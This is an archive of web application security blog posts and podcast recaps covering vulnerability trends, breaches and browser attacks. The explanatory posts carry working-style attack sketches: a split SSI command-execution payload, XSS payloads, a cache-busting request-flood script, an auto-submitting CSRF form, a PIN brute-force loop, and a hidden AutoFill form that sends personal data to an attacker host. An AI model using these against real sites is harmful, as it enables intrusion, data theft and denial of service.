Category Archives: Vulnerabilities

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to the extensive collection of vulnerabilities they have gathered over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, followed by the real birth of web application vulnerabilities in the mid-2000s. However, one thing that struck me as very odd is that we have been seeing a downward trend in reported web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch to something new, which means there is less pressure for incumbent code to be replaced and new frameworks are less likely to be adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves to the point where publicly reporting vulnerabilities is more annoying for researchers, provides them fewer benefits, and ultimately makes their lives more difficult than working with vendors directly or holding onto their vulnerabilities. The rise of bug bounties, where researchers get paid for disclosing a newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and should be watched carefully. It could be a hybrid of several of these factors, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning the issue involves a remote attacker and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common as they have ever been, or even more so. Said another way: compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13: Zombie POODLE, TCP/UDP Vulnerabilities, Jailed for XSS

This week Robert was keeping warm by his yule log while Jeremiah was freezing in the Boston snow, and I won’t be putting Christmas ornaments in my beard no matter how many of you send me that blog post. To get right into it, we started off by talking about the return of POODLE. For those with short-term memory loss, POODLE was a nasty vulnerability disclosed a few weeks back affecting SSLv3, which is a) still widely supported and b) easy to downgrade somebody’s browser into using. The zombie POODLE this week didn’t go after SSL this time; instead it went after TLS 1.2, which is used *everywhere*. The most prominent place that will need patching is F5 load balancers using this version of TLS – and that happens to be most of them. Sorry to all of you who lost sleep a few weeks ago, because it is about to happen again this week. Happy Holidays!

Next, if you recall a topic from last week’s episode regarding Google’s alternative to CAPTCHA: well, it appears Robert may be getting a Christmas wish early, and it didn’t take long. Before any of us had even seen it in the wild, Google’s new solution to replace CAPTCHAs was found to be very easily avoidable. The check-box that is supposed to tell whether you are a human or a robot turns out to fall back to a normal CAPTCHA, which is nothing new. If that wasn’t useless enough, it actually introduces a new weakness that didn’t exist before: this check-box is clickjackable! You can gather tons of valid tokens that say you are a human and load them into your botnet or whatever you’d like.
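To make the clickjacking angle concrete, here is a minimal sketch of the generic technique, not a working exploit; the iframe URL is a placeholder rather than the real widget endpoint. The attacker stacks an invisible frame containing the check-box directly over something the victim actually wants to click:

// Generic clickjacking sketch; the frame URL is a placeholder, not the real widget.
var bait = document.createElement('button');
bait.textContent = 'Click here to continue';
bait.style.cssText = 'position:absolute; top:120px; left:120px;';
document.body.appendChild(bait);

var frame = document.createElement('iframe');
frame.src = 'https://example.com/hypothetical-checkbox-widget';
// Transparent and stacked above the bait, so the click actually lands on the check-box.
frame.style.cssText = 'position:absolute; top:80px; left:80px; width:320px; height:140px; opacity:0; z-index:10;';
document.body.appendChild(frame);
// The visitor thinks they clicked the button; the page just minted an
// "I am a human" token that the scheme described above can then harvest.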

Now buckle up and put your splash guards on, because this next story blew our minds. A new proposal for the HTTP spec has popped up that would allow a browser to… wait for it… make raw TCP/UDP requests! Yup, you heard it. We had TCP/UDP and said: “Hey, let’s abstract a layer on top of that, and we’ll call it HTTP.” Now, fast forward to this month, and we are saying: “Hey, remember TCP/UDP? Let’s put that on top of HTTP!” I’m picturing Dory from Finding Nemo here. This opens tons of doors to all sorts of attacks behind a firewall via a web browser. Watch the video for a list of attacks Robert and I think might be possible if this gets implemented.
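To illustrate why that scares us, here is a purely hypothetical sketch; the TCPSocket constructor and its events below are assumptions for illustration, not the proposal’s actual API. The point is that a malicious page could quietly sweep the visitor’s internal network from inside the browser:

// Hypothetical API shape, for illustration only; not a real browser API today.
function probe(host, port) {
  return new Promise(function (resolve) {
    try {
      var sock = new TCPSocket(host, port); // assumed constructor
      sock.onopen = function () { sock.close(); resolve(true); };
      sock.onerror = function () { resolve(false); };
    } catch (e) {
      resolve(false);
    }
  });
}

// Sweep a common internal address range from behind the victim's firewall.
for (var i = 1; i < 255; i++) {
  (function (ip) {
    probe(ip, 22).then(function (open) {
      if (open) { console.log(ip + ':22 appears to be listening'); }
    });
  })('192.168.1.' + i);
}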

Lastly, we have a weird and sad story about somebody ending up in jail for a web “hack.” In Singapore, some unlucky fellow decided to poke around on the prime minister’s website. The site had a Google search bar embedded in it that reflected the search text unsanitized, making it vulnerable to XSS. He got a laugh out of this, crafted a link carrying the reflected XSS payload, and sent it around; the link made the prime minister’s site appear to display a Guy Fawkes mask in reference to Anonymous. The thing is, though, the site wasn’t actually defaced and no breach occurred. That didn’t stop the local authorities from sending this guy to jail for six months and fining him the equivalent of $34,000. As far as we know, he is the first person since Samy on MySpace (who is my hero) to land in jail over XSS.
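For anyone who hasn’t seen a reflected XSS link before, the kind of link described above has the general shape below (the domain and parameter name are invented for illustration; this is not the actual URL that was passed around). The script in the query string gets echoed back into the page and runs in the visitor’s own browser, which is how the mask could appear without the site itself ever being modified:

http://www.example.gov.sg/search?q=<script>/* attacker-supplied JavaScript, e.g. swap in a Guy Fawkes image */</script>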

Keep an eye out for some Bonus Footage this week where Robert and I dig into some JavaScript Flooding attacks with an easy demo!

Resources:
POODLE back to bite TLS connections
The No CAPTCHA Problem
TCP and UDP Socket API
Singapore Hacker Jailed for XSS on Prime Minister’s Office Website

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavy database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter-value pairs each time to bypass caching servers like Varnish. An adversary wouldn’t want to run this kind of code directly, since the flood would come from their own IP address; it’s much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.
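Purely to illustrate the cache-busting idea (this is not the FlashFlood script itself, and the target URL and parameter name are placeholders), a minimal sketch looks something like this:

// Core idea only: every request carries a unique query string, so a caching
// layer like Varnish can't serve it from cache and the origin server /
// database has to do the work for each request.
function flood(target, count) {
  for (var i = 0; i < count; i++) {
    var img = new Image();
    // 'cachebuster' is a placeholder parameter name; any unused parameter works.
    img.src = target + '?cachebuster=' + Date.now() + '_' + Math.random();
  }
}
flood('http://example.com/expensive-page', 1000); // placeholder target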

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some modern-day knowledge about web application security to 20-year-old tech? So I took a look at the web board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, there have been a number of vulns found in it over the years – four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past Perl regexes if you allow nulls. But that second regex makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it up into two chunks that would be executed together once the page was re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browsers more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional places all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things really were, though, and how little security there really was when the web was in its infancy.

#HackerKast 12: Operation Cleaver, Sony and PayPal Hacks, Google’s Alternative to CAPTCHA

Kicked this week off in the holiday spirit with Robert and Jeremiah hanging out in a festive hotel down in Los Angeles, probably preparing to cause lots of trouble. The first story we touched on was Operation Cleaver, a report put out by Cylance. The research investigates the movements and threat of one particular pro-Iranian hacking group that has been targeting airports and transportation systems across 16 countries. The claim is that this group has “attained the highest level of system access” across all the countries targeted. The reason we web nerds are interested is that the main front door used to start these hacks appears to have been SQL injection.

Next, we had to do it: we simply couldn’t get through a HackerKast without talking about Sony. This hack is bad. Bad for a lot of people, and as Jeremiah points out, there is a real human aspect to this. Tons of real people’s information has been leaked, and that will cause a lot of pain. So far, 40GB of a claimed 100TB that was stolen has been leaked and is available on the Internet via torrents. Robert brings up a good point that, given the business Sony is in, moving terabytes of data around probably isn’t an alarm-ringing event. Another great point we discussed is that this hack required insider access. Even though the end result was bad, that does suggest Sony is probably doing a pretty good job on their exterior security; otherwise the attackers would’ve taken the path of least resistance there.

Can we get through an episode without talking about a WordPress vulnerability? Please? Anyway, we have another one this week, and it affects 850,000 WordPress sites. The culprit this time is the extremely popular WordPress Download Manager plugin, which is vulnerable to a very blatant Remote Code Execution via a simple POST request. An attacker can craft an HTTP POST request containing PHP code and have it immediately executed on the server, leading to absolute and full compromise of any server running this plugin. Do I even need to mention that the vulnerable function has “ajax_exec” in its name?
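We won’t reproduce the actual exploit here, but the general shape of this class of bug (the endpoint and parameter names below are placeholders, not the plugin’s real ones) is a single unauthenticated POST whose body carries code the vulnerable handler ends up executing:

// Shape of the attack only. The URL and field names are placeholders,
// not the Download Manager plugin's actual handler or parameters.
fetch('http://victim.example/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'action=hypothetical_handler&payload=' +
        encodeURIComponent('<?php system("id"); ?>') // attacker-supplied PHP
});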

Robert then took a look at a nasty PayPal hack that was published by an Egyptian researcher this week. The clever attack outlined here used a CSRF vulnerability to bypass the protections around changing a user’s password-reset security questions. Security questions are a soft spot in a lot of web applications: they are effectively as good as a password, since answering them correctly lets you set a new password of your own. The reason CSRF is so bad on this functionality is that an attacker can force an authenticated user’s browser to reset these questions without their knowledge. I then sat back for a moment and let Jeremiah and Robert reminisce about the good ole days when dinosaurs roamed the Internet and CSRF wasn’t even considered a vulnerability.
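For readers newer to CSRF, the generic pattern (illustrative only; the URL and field names are invented, not PayPal’s actual endpoints) is a page the victim merely visits that silently submits a state-changing request using the victim’s own authenticated session:

// Generic CSRF sketch -- URL and field names are invented for illustration.
var f = document.createElement('form');
f.method = 'POST';
f.action = 'https://victim.example/account/reset-security-questions';
['question1=pet name', 'answer1=fluffy'].forEach(function (pair) {
  var parts = pair.split('=');
  var input = document.createElement('input');
  input.type = 'hidden';
  input.name = parts[0];
  input.value = parts[1];
  f.appendChild(input);
});
document.body.appendChild(f);
// The victim's browser attaches their session cookies automatically, so the
// request looks legitimate unless the site also demands an anti-CSRF token.
f.submit();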

Finally, we talked a bit about the new Google gadget recently released as a bold new alternative to the ever-annoying CAPTCHA. Instead of entering some mess of garbled text, Google claims it can tell the difference between a bot and a human with just one click of a check-box. Robert got visibly angered by this idea (ok, maybe not, but he really doesn’t like it). He does admit that today the idea will work well, thanks to the heuristics currently used to detect a human. Things like mouse movements, time to click the button, etc., are key pieces of information that differentiate real from fake traffic, and they have been important to Google for detecting ad fraud for years. The problem is that this has now been released publicly for any attacker to fuzz and defeat the heuristics. The rest of the problems with this probably deserve a separate blog post, but to put a bow on it, what Robert is suggesting is that this will raise the bar for bot sophistication – and once bots reach that level, heuristics that aren’t Google-grade won’t be able to keep up.

That’s a wrap this week, hope you enjoy watching as much as we enjoy making these episodes!

Resources:
Security Advisory – High Severity– WordPress Download Manager
Hacking PayPal Account with Just a Click
Are you a robot? Introducing ‘No CAPTCHA reCAPTCHA’
Critical networks in US, 15 other nations, completely owned, possibly by Iran
Cylance: Operation Cleaver Report
Why Sony’s Plan to Foil PlayStation-Type Attacks Faltered

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week we decided to add a little bonus footage for a bit more technical content instead of just news stories. We mastered the power of Screensharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser AutoComplete hacking. This isn’t a new topic by any means, but we hackers get curious every once in a while, so Jeremiah decided to see if this bug is still around.

The premise is simple: you place a form on a website that you control and ask for the user’s name. When the user begins to type their name, some browsers (Chrome and Safari are featured in the video) will offer the convenience of auto-filling the form. The user doesn’t feel like typing their whole name out and lets the browser do it. What the user doesn’t see is the rest of the form fields, easily rendered invisible with simple CSS and named appropriately to grab the rest of the information out of their AutoFill contacts profile.

In the video, Jeremiah shows how a bit of tomfoolery and JavaScript makes it possible to grab things like an unsuspecting user’s phone number, birthday, address, email, etc. just by having them start to type their name and letting AutoFill do the rest. The demo was done on Mac OS X using the latest versions of Safari and Chrome.
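This is not the code from the demo, but a minimal sketch of the trick looks roughly like the following (the attacker URL is a placeholder, and the exact field names and hiding techniques a given browser honors will vary): one visible name field, plus off-screen fields that AutoFill may populate along with it.

<form action="https://attacker.example/collect" method="POST">
  Name: <input type="text" name="name" autocomplete="name">
  <!-- The victim never sees these fields, but AutoFill may populate them anyway -->
  <div style="position:absolute; left:-9999px;">
    <input type="text" name="email" autocomplete="email">
    <input type="text" name="phone" autocomplete="tel">
    <input type="text" name="address" autocomplete="street-address">
  </div>
  <input type="submit" value="Continue">
</form>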

Again, not much new and revolutionary but still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability uncovered in the very popular jQuery Validation Plugin. The plugin is widely used as a simple form validator, and the researcher, Sijmen Ruwhof, found the bug in its CAPTCHA implementation. The bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using the plugin, and another 300,000 – 1 million websites potentially using it or similar vulnerable code. The piece that amused all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. Some digging showed the bug had already been sitting in OSVDB since 2013 with no action taken. After Ruwhof warned the plugin’s author again and published the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of a new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news, since there are a ton of CAs out there already, but what makes Let’s Encrypt interesting is that it is a non-profit, *FREE* certificate authority. The project is backed by the EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers, and it focuses on being free and easy to use in order to lower the barrier to entry for encrypting your web traffic. Robert brings up a good question about browser support: if Microsoft or Google doesn’t support this right away, it really only helps the 20% or so of users on Firefox. The other question here is what effect this will have on for-profit certificate authorities.

Now, we of course had to mention the blog post that went somewhat viral recently about all the information Google collects about you. None of it was terribly surprising to those of us in this industry, but it was certainly eye-opening for a lot of people out there. You can easily look up the advertising profile Google has built on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief, I’m not into Reggaeton). However, the creepy one for me was the “Location History,” which was *extremely* precise.

These six links hitting the blogosphere had good timing, as Mozilla also announced that they will be switching Firefox’s default search engine to Yahoo. This is HUGE news considering that somewhere upwards of 95% of Mozilla’s revenue comes from Google paying to be the default engine. Firefox also still has a 20% share of browser users, all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling by a judge in the United States who said the police are allowed to compel people to use any sort of biometric-based authentication, but not password-based. For example, it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone, but still not so for a four-digit PIN. This has all sorts of interesting implications for information security and personal privacy when it comes to law enforcement.

With absolutely no segue, we covered a new story about China, which seems to be one of Robert’s favorite topics. It turns out that China published a list of a ton of newly blocked websites, and one that stood out was Edgecast. Edgecast is particularly interesting because on its own it isn’t a website worth noting, but it is a CDN, which means China has blocked all of its customers as well – potentially hundreds of thousands of sites. The comparison was made to blocking Akamai. It will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, often the affected company will [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes, because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL Injection, brute force, phishing, password reuse, old and well-known vulnerabilities, etc.).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an attempt to convey that the company did nothing wrong, that there was nothing it could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that it “takes security seriously” – so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec on what constitutes a ‘sophisticated’ attack. Clearly, some attacks actually are sophisticated – Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands of them largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The tweets I received were fairly consistent. I distilled the thoughts down to a set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.

#HackerKast 8: Recap of JPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake for being cold in Texas, we started off this week’s HackerKast with some discussion of the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not one of their main webpages but a one-off, brochureware-type site built to promote and organize a company-sponsored running race event.

This shift in attacker focus is something we in the AppSec world have taken notice of and realize we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, are either hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs on Security, who pointed out the value to attackers of targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points, and cashing out. One major weakness pointed out here is that most of these services gate your reward points account with only a four-digit PIN. Robert makes a great point that even if they move from four-digit PINs to a password system, that only makes brute forcing somewhat harder; if the bad guys find value here, they’ll just update current malware strains to attack these types of accounts.
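To put the four-digit PIN problem in perspective, there are only 10,000 possible values, so something as trivial as the sketch below (the URL and field names are invented, and it assumes success is distinguishable from failure in the response) could walk the entire space; without aggressive rate limiting and lockouts, the PIN itself provides almost no protection:

// Illustration of the tiny search space only; endpoint and fields are made up.
async function guessPin(account) {
  for (var pin = 0; pin < 10000; pin++) {
    var candidate = String(pin).padStart(4, '0'); // 0000 through 9999
    var res = await fetch('https://rewards.example/login', {
      method: 'POST',
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      body: 'account=' + encodeURIComponent(account) + '&pin=' + candidate
    });
    if (res.ok) { return candidate; } // assumes a successful login is visible here
  }
  return null; // at most 10,000 attempts
}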

Robert then talked about a new Tor onion service version of Facebook that has been set up to allow anonymous use of Facebook. There is the obvious use case of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out without worrying about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik, who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug, but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs in the Tag Manager interface were properly sanitized, but the service also let you upload a JSON file containing additional configs and inputs for SEO tags. That file was not sanitized, so an XSS payload could be stored – a persistent XSS delivered via file upload. Pretty juicy stuff!
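As an illustration only (these field names are invented; the real Tag Manager container format is not reproduced here), the idea is simply that a value inside the uploaded file carries markup that is later rendered without encoding:

// Hypothetical structure, for illustration; not the real container format.
var uploadedConfig = {
  "tagName": "<script>alert(document.domain)</script>", // rendered unescaped later
  "note": "field names here are invented for illustration"
};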

Finally, we wrapped up talking about Google some more, with a bypass of Gmail two-factor authentication. Specifically, the attack in question goes after the text-message implementation of 2FA, not the token app that Google puts out. There are a number of ways this can happen, but the most recent story involves attackers calling up mobile providers and social engineering their way into access to the victim’s text messages, in order to grab the second-factor token and compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

#HackerKast 7: Drupal Compromise, Tor + Bitcoin Decloaking, Verizon’s ‘Perma-Cookie,’ and Formula One Racing

This week Jeremiah Grossman, Robert Hansen and Matt Johansen discuss the latest around the recent Drupal compromise, which affects any Drupal 7 site that was not patched prior to Oct. 15. Robert also takes us to the Circuit of the Americas track in Austin to talk a little about how Tor + Bitcoin can effectively decloak people and even allow attackers to steal all of a user’s bitcoins. Also a topic of discussion this week: Verizon’s Unique Identifier Header, or UIDH (aka a ‘Perma-Cookie’), which can be read by any web server you visit and used to build a profile of your Internet habits.

Resources:
Assume ‘Every Drupal 7 Site Was Compromised’ Unless Patched By Oct. 15

Verizon’s ‘Perma-Cookie’ Is a Privacy-Killing Machine

Bitcoin Over Tor Isn’t a Good Idea